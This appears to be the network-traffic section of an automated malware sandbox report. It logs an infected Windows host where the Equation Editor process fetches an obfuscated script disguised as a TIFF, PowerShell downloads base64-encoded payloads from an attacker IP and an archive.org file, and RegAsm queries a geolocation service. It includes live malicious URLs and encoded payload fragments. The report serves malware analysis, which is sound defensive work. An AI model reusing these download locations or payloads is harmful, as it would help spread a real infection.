                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.2249161107.175.242.80803316C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:41:04.735850096 CEST337OUTGET /430/sweetbuddygirltodaysherewith.tIF HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 107.175.242.80
                                                                Connection: Keep-Alive
                                                                Oct 7, 2024 22:41:05.238651991 CEST1236INHTTP/1.1 200 OK
                                                                Date: Mon, 07 Oct 2024 20:41:05 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                Last-Modified: Wed, 18 Sep 2024 12:22:50 GMT
                                                                ETag: "39af8-62263dd53fd0e"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 236280
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: image/tiff
                                                                Data Raw: ff fe 4b 00 52 00 74 00 4c 00 6f 00 69 00 69 00 4c 00 62 00 63 00 52 00 52 00 43 00 50 00 70 00 68 00 55 00 61 00 76 00 4b 00 70 00 20 00 3d 00 20 00 22 00 4b 00 42 00 41 00 42 00 6d 00 7a 00 57 00 47 00 6c 00 6e 00 76 00 75 00 6f 00 57 00 65 00 6a 00 55 00 55 00 4c 00 6b 00 4c 00 22 00 0d 00 0a 00 57 00 57 00 4b 00 74 00 65 00 75 00 43 00 4c 00 69 00 4b 00 6b 00 7a 00 4b 00 70 00 5a 00 62 00 4c 00 4c 00 52 00 62 00 47 00 20 00 3d 00 20 00 22 00 66 00 57 00 6b 00 4b 00 65 00 63 00 64 00 69 00 57 00 57 00 71 00 4c 00 4c 00 4e 00 66 00 4a 00 42 00 57 00 4c 00 68 00 4b 00 22 00 0d 00 0a 00 42 00 4c 00 49 00 41 00 69 00 47 00 4e 00 4b 00 4b 00 71 00 63 00 68 00 4c 00 6a 00 64 00 4b 00 63 00 4c 00 55 00 5a 00 63 00 20 00 3d 00 20 00 22 00 4c 00 4b 00 57 00 7a 00 43 00 65 00 47 00 70 00 68 00 4b 00 64 00 4e 00 66 00 72 00 78 00 51 00 4b 00 74 00 66 00 4c 00 6c 00 22 00 0d 00 0a 00 66 00 4c 00 4c 00 7a 00 6f 00 54 00 6b 00 6f 00 48 00 75 00 4c 00 47 00 66 00 75 00 50 00 4b 00 41 00 73 00 68 00 42 00 41 00 [TRUNCATED]
                                                                Data Ascii: KRtLoiiLbcRRCPphUavKp = "KBABmzWGlnvuoWejUULkL"WWKteuCLiKkzKpZbLLRbG = "fWkKecdiWWqLLNfJBWLhK"BLIAiGNKKqchLjdKcLUZc = "LKWzCeGphKdNfrxQKtfLl"fLLzoTkoHuLGfuPKAshBA = "UUWibcoRaTqsidcBNWicU"qrLPdAfNOGBibCTOWUbpf = "GBIKudcLpROcTWGmToNkv"PzGWUiaccuKzWUCPIWZfh = "PhcGUifdnLtLPKLzbhKUj"ZRAcNZUZliKmvhGoPWccW = "eAIUdTeKZnJiLoobbqkit"eWedzLLOWGKttWfpdPWLP = "OBGULfsCzxGtifILZicfi"zrgAhPiLcRaUizHpKvSLR = "GoGPPLIPgnftzGBkaBcpb"lhWkSKLKucmRkChLUOG
                                                                Oct 7, 2024 22:41:05.238679886 CEST1236INData Raw: 00 47 00 71 00 20 00 3d 00 20 00 22 00 6c 00 63 00 4b 00 74 00 4c 00 4b 00 78 00 6b 00 4c 00 4c 00 42 00 6b 00 4c 00 4b 00 75 00 72 00 75 00 55 00 63 00 7a 00 64 00 22 00 0d 00 0a 00 0d 00 0a 00 4e 00 65 00 4e 00 63 00 49 00 63 00 4e 00 6b 00 61
                                                                Data Ascii: Gq = "lcKtLKxkLLBkLKuruUczd"NeNcIcNkaJKmfcUiUHZLW = "cqWcUIisbiAGOgRBciAKo"WNiQIlGdLNuWmpLAWZxeK = "GWpLoZtPLcizzhe
                                                                Oct 7, 2024 22:41:05.238691092 CEST448INData Raw: 00 42 00 54 00 4a 00 4c 00 6b 00 22 00 0d 00 0a 00 4c 00 49 00 4e 00 6a 00 41 00 6c 00 70 00 70 00 49 00 63 00 4a 00 52 00 6f 00 57 00 63 00 57 00 4e 00 5a 00 4b 00 71 00 6e 00 20 00 3d 00 20 00 22 00 41 00 55 00 4c 00 62 00 6c 00 57 00 57 00 4b
                                                                Data Ascii: BTJLk"LINjAlppIcJRoWcWNZKqn = "AULblWWKROClzLBZWlnWW"ukUiAkpAkqLKfNxkIcemb = "cbAKGcUoLKziLLqCrzWiq"ULOfdGLakBvpUWL
                                                                Oct 7, 2024 22:41:05.238919020 CEST1236INData Raw: 00 57 00 20 00 3d 00 20 00 22 00 4b 00 4b 00 5a 00 6b 00 4c 00 69 00 6e 00 42 00 62 00 61 00 4c 00 6f 00 54 00 51 00 57 00 70 00 4c 00 63 00 55 00 63 00 65 00 22 00 0d 00 0a 00 4c 00 70 00 70 00 4e 00 43 00 63 00 70 00 6d 00 69 00 70 00 4c 00 5a
                                                                Data Ascii: W = "KKZkLinBbaLoTQWpLcUce"LppNCcpmipLZGlzpPZWhL = "ORjGnzAAkQudApLhdGmZW"miKBmiqQKmjzUWUeIPUWW = "OpAjfNUlmdzmcWWZLT
                                                                Oct 7, 2024 22:41:05.238930941 CEST1236INData Raw: 00 57 00 74 00 22 00 0d 00 0a 00 6f 00 66 00 69 00 47 00 47 00 68 00 57 00 51 00 76 00 70 00 5a 00 6d 00 72 00 63 00 57 00 50 00 7a 00 64 00 5a 00 4b 00 4a 00 20 00 3d 00 20 00 22 00 75 00 57 00 4b 00 5a 00 4e 00 4b 00 57 00 57 00 68 00 61 00 6d
                                                                Data Ascii: Wt"ofiGGhWQvpZmrcWPzdZKJ = "uWKZNKWWhameccAKdzBlU"BdfGKztliWPibHiHKniJI = "RAlKLpxWbjcPLhZWPcalC"WSuAcGidzommknWp
                                                                Oct 7, 2024 22:41:05.238945007 CEST1236INData Raw: 00 20 00 3d 00 20 00 22 00 51 00 4c 00 4f 00 57 00 57 00 42 00 4c 00 63 00 73 00 6b 00 54 00 70 00 57 00 4b 00 4f 00 78 00 68 00 62 00 65 00 55 00 6d 00 22 00 0d 00 0a 00 6b 00 48 00 66 00 55 00 61 00 4c 00 63 00 4f 00 4b 00 55 00 63 00 69 00 65
                                                                Data Ascii: = "QLOWWBLcskTpWKOxhbeUm"kHfUaLcOKUcieuULLWBWx = "jaAJzWGGPJhcAcaaupxGl"cfALhsUITqPcLdLrGhZLN = "prhLxKkmcmAhRdiSsaC
                                                                Oct 7, 2024 22:41:05.238955975 CEST1236INData Raw: 00 57 00 50 00 65 00 55 00 66 00 66 00 53 00 57 00 66 00 22 00 0d 00 0a 00 57 00 47 00 4b 00 75 00 6b 00 4b 00 4f 00 6f 00 74 00 47 00 6b 00 57 00 47 00 76 00 75 00 43 00 72 00 4f 00 64 00 6b 00 71 00 20 00 3d 00 20 00 22 00 71 00 57 00 4b 00 50
                                                                Data Ascii: WPeUffSWf"WGKukKOotGkWGvuCrOdkq = "qWKPliiLpGWKcfmuiLLqG"WlbUKkicpKaeqGSCmtjkn = "qulxiWxhcixikcZLlWOUc"qWiandiraaW
                                                                Oct 7, 2024 22:41:05.239502907 CEST1236INData Raw: 00 4e 00 48 00 6d 00 71 00 74 00 54 00 67 00 43 00 62 00 41 00 6b 00 6b 00 64 00 20 00 3d 00 20 00 22 00 69 00 4c 00 69 00 68 00 57 00 4b 00 42 00 74 00 4e 00 6f 00 74 00 66 00 5a 00 63 00 4b 00 4e 00 72 00 65 00 72 00 61 00 78 00 22 00 0d 00 0a
                                                                Data Ascii: NHmqtTgCbAkkd = "iLihWKBtNotfZcKNrerax"KWBxKCdGLNOCLPPzPbiAc = "ZamTqAWTAWLcqUGpZmGcG"diZqfdHcAWaoCPUQWaoLP = "cLcLbW
                                                                Oct 7, 2024 22:41:05.239516973 CEST1236INData Raw: 00 68 00 73 00 63 00 6e 00 62 00 57 00 55 00 57 00 50 00 4c 00 62 00 57 00 75 00 41 00 22 00 0d 00 0a 00 57 00 4c 00 6c 00 62 00 5a 00 6c 00 55 00 57 00 50 00 4c 00 53 00 4e 00 6f 00 4f 00 50 00 6f 00 68 00 4b 00 4b 00 41 00 4c 00 20 00 3d 00 20
                                                                Data Ascii: hscnbWUWPLbWuA"WLlbZlUWPLSNoOPohKKAL = "ZAzpeWzxKKGGgLvZLivWK"LnkHLbkkPcGndLkPUkxBc = "bTZWccapdKiiuefOUcpKL"BWJmmL
                                                                Oct 7, 2024 22:41:05.239528894 CEST1236INData Raw: 00 57 00 6f 00 7a 00 57 00 74 00 55 00 7a 00 5a 00 50 00 63 00 75 00 57 00 52 00 69 00 20 00 3d 00 20 00 22 00 63 00 54 00 57 00 57 00 72 00 4c 00 52 00 5a 00 6b 00 57 00 4b 00 74 00 43 00 6e 00 69 00 6e 00 68 00 57 00 57 00 4f 00 71 00 22 00 0d
                                                                Data Ascii: WozWtUzZPcuWRi = "cTWWrLRZkWKtCninhWWOq"nBGifNZHsmoWicRLirLPL = "TeULkLKoKpTKiloKZUURh"AbAtaHcPdKoedueUxWQAd = "CBaez
                                                                Oct 7, 2024 22:41:05.243637085 CEST1236INData Raw: 00 6f 00 4c 00 61 00 69 00 68 00 51 00 70 00 47 00 62 00 4f 00 55 00 55 00 57 00 41 00 6b 00 22 00 0d 00 0a 00 6d 00 68 00 5a 00 65 00 4f 00 6d 00 4c 00 66 00 75 00 6f 00 6a 00 51 00 52 00 69 00 6b 00 4e 00 69 00 7a 00 69 00 4f 00 6b 00 20 00 3d
                                                                Data Ascii: oLaihQpGbOUUWAk"mhZeOmLfuojQRikNiziOk = "oqkAjOSlGWWZiLcZKbCLK"cKIKiipOnUnaNnOKtnqKi = "ATNPaIGaRSGZWpxtklZqU"uWhBP


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.2249163107.175.242.80803640C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:41:13.328831911 CEST77OUTGET /430/KNOCC.txt HTTP/1.1
                                                                Host: 107.175.242.80
                                                                Connection: Keep-Alive
                                                                Oct 7, 2024 22:41:14.005676031 CEST1236INHTTP/1.1 200 OK
                                                                Date: Mon, 07 Oct 2024 20:41:13 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                Last-Modified: Wed, 18 Sep 2024 11:39:04 GMT
                                                                ETag: "a1000-6226340c7d57c"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 659456
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/plain
                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                                                                Oct 7, 2024 22:41:14.005693913 CEST224INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                                Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1
                                                                Oct 7, 2024 22:41:14.005702972 CEST1236INData Raw: 41 55 4e 38 55 44 4f 31 67 53 4e 6b 55 44 46 30 77 50 4e 30 54 44 38 30 77 4f 4e 6f 54 44 32 30 51 4e 4e 45 54 44 72 30 51 4b 4e 67 53 44 6e 30 77 49 4e 49 53 44 65 30 41 47 4e 59 52 44 56 30 51 45 4e 41 52 44 4d 30 67 42 4e 51 51 44 44 7a 77 2f
                                                                Data Ascii: AUN8UDO1gSNkUDF0wPN0TD80wONoTD20QNNETDr0QKNgSDn0wINISDe0AGNYRDV0QENARDM0gBNQQDDzw/M4PD4zw9MYPD1zA8M4ODtAAQAgBgBQDQOYkDFAAAAMAgBADAAA0D4AAAAMAgBwCAOgjD24QIOAiDf4gEOogDB3w+NofD23A8NIeDe3w1NYdDO3QzNwcDLAAAAwAgBQCgNwYDL1AbNsWDq1QaNgWDn1gZNMWDi1QYN
                                                                Oct 7, 2024 22:41:14.005712986 CEST1236INData Raw: 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44
                                                                Data Ascii: mDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD1
                                                                Oct 7, 2024 22:41:14.005724907 CEST1236INData Raw: 77 6d 4f 6f 70 44 5a 36 41 6d 4f 63 70 44 57 36 51 6c 4f 51 70 44 54 36 67 6b 4f 45 70 44 51 36 77 6a 4f 34 6f 44 4e 36 41 6a 4f 73 6f 44 4b 36 51 69 4f 67 6f 44 48 36 67 68 4f 55 6f 44 45 36 77 67 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66
                                                                Data Ascii: wmOopDZ6AmOcpDW6QlOQpDT6gkOEpDQ6wjO4oDN6AjOsoDK6QiOgoDH6ghOUoDE6wgOIoDB6AQO8nD+5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QWOglDT5gUOElDQ4QFOQhDT4gEAAAA4AUAwAAAA1AcN4WDs1gaNgWDm1AZNIWDg1gXN
                                                                Oct 7, 2024 22:41:14.005955935 CEST672INData Raw: 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44
                                                                Data Ascii: nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4MwODrzg6MkODozw5MYODlzA5MMODizQ4MAODf
                                                                Oct 7, 2024 22:41:14.005966902 CEST1236INData Raw: 59 44 48 32 67 68 4e 55 59 44 45 32 77 67 4e 49 55 44 2f 31 67 66 4e 30 58 44 38 31 77 65 4e 6f 58 44 35 31 41 65 4e 63 58 44 32 31 51 64 4e 51 58 44 7a 31 67 63 4e 45 58 44 77 31 77 62 4e 34 57 44 74 31 41 62 4e 73 57 44 71 31 51 61 4e 67 57 44
                                                                Data Ascii: YDH2ghNUYDE2wgNIUD/1gfN0XD81weNoXD51AeNcXD21QdNQXDz1gcNEXDw1wbN4WDt1AbNsWDq1QaNgWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEQD/AAQAwBQBQCQMsFjYxgVMOFDRxoTMwEjJxwRMSEDCw4PM0Dj6wAOMWDDz
                                                                Oct 7, 2024 22:41:14.005978107 CEST1236INData Raw: 41 57 4e 4f 56 44 50 31 6f 53 4e 59 51 44 31 30 41 4d 4e 77 52 54 61 30 34 43 4e 59 4d 6a 35 7a 6f 39 4d 72 4f 6a 6e 7a 41 32 4d 2f 4d 54 4e 7a 49 69 4d 34 4c 7a 37 79 67 75 4d 6d 4b 7a 6e 79 55 6d 4d 50 4a 44 4f 79 45 6a 4d 49 49 44 41 78 4d 65
                                                                Data Ascii: AWNOVDP1oSNYQD10AMNwRTa04CNYMj5zo9MrOjnzA2M/MTNzIiM4Lz7yguMmKznyUmMPJDOyEjMIIDAxMeMVHjxxYYMsBAAAwHAFAAA/Q1Pm4T++cuPP7jx+kUPC2za94VPR1DR9MAP2zz78gOPhzDZ8kFP7wDF7I/OHvzk782OgtjV78kOypjH4gHOScDV3Y0NzczK30hNWbTy2UrNjazO1kdNgUDG1oAN5TD70EONhSDj0gHN
                                                                Oct 7, 2024 22:41:14.005987883 CEST1236INData Raw: 50 54 38 7a 63 2b 4d 67 50 54 30 7a 73 38 4d 45 50 54 75 79 30 6a 4d 79 45 6a 30 78 6f 58 4d 30 46 6a 62 78 73 56 4d 4e 46 54 52 78 34 53 4d 6b 45 54 47 78 4d 52 4d 4f 41 54 36 77 41 4f 4d 38 43 44 74 77 55 48 4d 74 42 44 4c 77 45 43 41 41 41 41
                                                                Data Ascii: PT8zc+MgPT0zs8MEPTuy0jMyEj0xoXM0FjbxsVMNFTRx4SMkETGxMRMOAT6wAOM8CDtwUHMtBDLwECAAAAnAQAkAAAA/48PI/TY/k1PL9zQ/ozPx8TK/EyPZ8jD+wvP07D6+AuPX7jz+YsP+6jt+4qPh6Tl+0oPP5zI9cfPQ3jy9QcP+2jt9IbPn2Dm9wYP71zb90VP50jK9wBP6zT98APPczT08wLPvyDp8UHPXxjU80EPCxjJ
                                                                Oct 7, 2024 22:41:14.005999088 CEST1236INData Raw: 4d 49 4e 39 52 7a 64 30 30 47 4e 5a 51 54 42 7a 38 2f 4d 74 50 54 72 7a 49 35 4d 41 4f 7a 62 7a 59 32 4d 63 4e 44 56 7a 49 6b 4d 36 4c 54 38 79 38 74 4d 59 4c 6a 62 79 30 6c 4d 59 4a 44 54 79 63 6b 4d 30 49 44 4b 79 45 69 4d 4b 45 44 39 78 34 64
                                                                Data Ascii: MIN9Rzd00GNZQTBz8/MtPTrzI5MAOzbzY2McNDVzIkM6LT8y8tMYLjby0lMYJDTyckM0IDKyEiMKED9x4dMPHznxgWMSBjHAAAA0CABwAAAA8T7/I+PH/zo/c4P15zT+EjPT0jz8QOPXzzx8oLPCsjw7A7OjuDm7Q3OEtzN70hOyqjc48MO6aTv2wVNSXDi1MXNZQjxzkrMbLDuygYM3BAAAgFAEACA7MxNFfDq3YlNwXD21sBN
                                                                Oct 7, 2024 22:41:14.006150961 CEST1236INData Raw: 77 44 49 38 73 78 4f 57 76 44 67 37 77 33 4f 34 74 44 64 37 38 32 4f 6f 74 54 4d 35 4d 59 4f 31 6c 7a 56 35 51 6b 4e 73 61 44 71 32 51 71 4e 67 61 7a 6d 32 59 6c 4e 41 55 44 2f 31 67 66 4e 30 58 7a 37 31 67 65 4e 78 53 7a 41 7a 55 2f 4d 58 50 44
                                                                Data Ascii: wDI8sxOWvDg7w3O4tDd782OotTM5MYO1lzV5QkNsaDq2QqNgazm2YlNAUD/1gfN0Xz71geNxSzAzU/MXPDxzcgMELjvy4qMFKDXyYjMUIjDyAQM7HT9x8eMpHD5x4dMYHj0x0cMHHTwxsbM2GDsxoaMkGznxkZMTGTjxgYMCGDfxYXMxFzaxUWMfFjWxQVMOFDSxMUM9EzNxETMsEjJxASMaETFx8QMJEzAw4PM4Dj8wwOMnDT4


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.2249165178.237.33.50803764C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:41:17.257353067 CEST71OUTGET /json.gp HTTP/1.1
                                                                Host: geoplugin.net
                                                                Cache-Control: no-cache
                                                                Oct 7, 2024 22:41:17.891160011 CEST1170INHTTP/1.1 200 OK
                                                                date: Mon, 07 Oct 2024 20:41:17 GMT
                                                                server: Apache
                                                                content-length: 962
                                                                content-type: application/json; charset=utf-8
                                                                cache-control: public, max-age=300
                                                                access-control-allow-origin: *
                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.2249162207.241.227.2404433640C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-07 20:41:10 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                                Host: ia600100.us.archive.org
                                                                Connection: Keep-Alive
                                                                2024-10-07 20:41:10 UTC606INHTTP/1.1 200 OK
                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                Date: Mon, 07 Oct 2024 20:41:10 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 2823512
                                                                Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                                Connection: close
                                                                ETag: "66e22cba-2b1558"
                                                                Strict-Transport-Security: max-age=15724800
                                                                Expires: Tue, 08 Oct 2024 02:41:10 GMT
                                                                Cache-Control: max-age=21600
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                Access-Control-Allow-Credentials: true
                                                                Accept-Ranges: bytes
                                                                2024-10-07 20:41:10 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
